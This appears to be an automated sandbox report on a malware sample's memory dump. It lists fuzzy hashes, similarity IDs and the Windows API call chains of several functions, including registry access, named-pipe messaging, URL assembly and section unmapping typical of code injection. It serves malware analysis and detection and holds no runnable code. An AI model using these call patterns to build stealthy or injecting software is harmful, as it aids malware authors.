  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
